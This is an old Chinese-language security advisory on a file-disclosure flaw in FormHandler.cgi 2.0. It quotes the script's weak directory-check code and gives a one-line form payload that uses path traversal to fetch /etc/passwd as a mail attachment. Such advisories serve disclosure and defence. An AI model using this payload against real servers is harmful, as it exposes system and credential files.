FormHandler.cgi回复附件漏洞
发布日期:1999-11-16
更新日期:1999-11-16
受影响系统:Matt Wright FormHandler.cgi 2.0
描述:
对于FormHandler.cgi(通常在unix系统下以'nobody'运行)有读权限的文件都可以做为回复邮件的附件。这就造成了攻击者可以通过修改form文件来获取如/etc/passwd等敏感文件。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@ALLOWED_ATTACH_DIRS = ('all'); # hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]
if (&valid_directory($filename)) { # let's check if file is allowed
push(@files, $filename); [...] } # to send
[...]
sub valid_directory {
local ($filename) = $_[0];
local ($allowed_path, $restricted_path);
local($valid_dir) = 0;
if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
else {
foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
$valid_dir = ($filename =~ /^$allowed_path/); # silly ...
last if $valid_dir;
}
}
foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
$valid_dir = ($filename !~ /^$restricted_path/); # once more
last if !$valid_dir;
}
return $valid_dir;
}
[...]
How to d/l /etc/passwd ? Just add this to the form:
VALUE="text:/tmp/../etc/passwd">
建议:
暂无
浏览次数:7331
严重程度:0(网友投票)
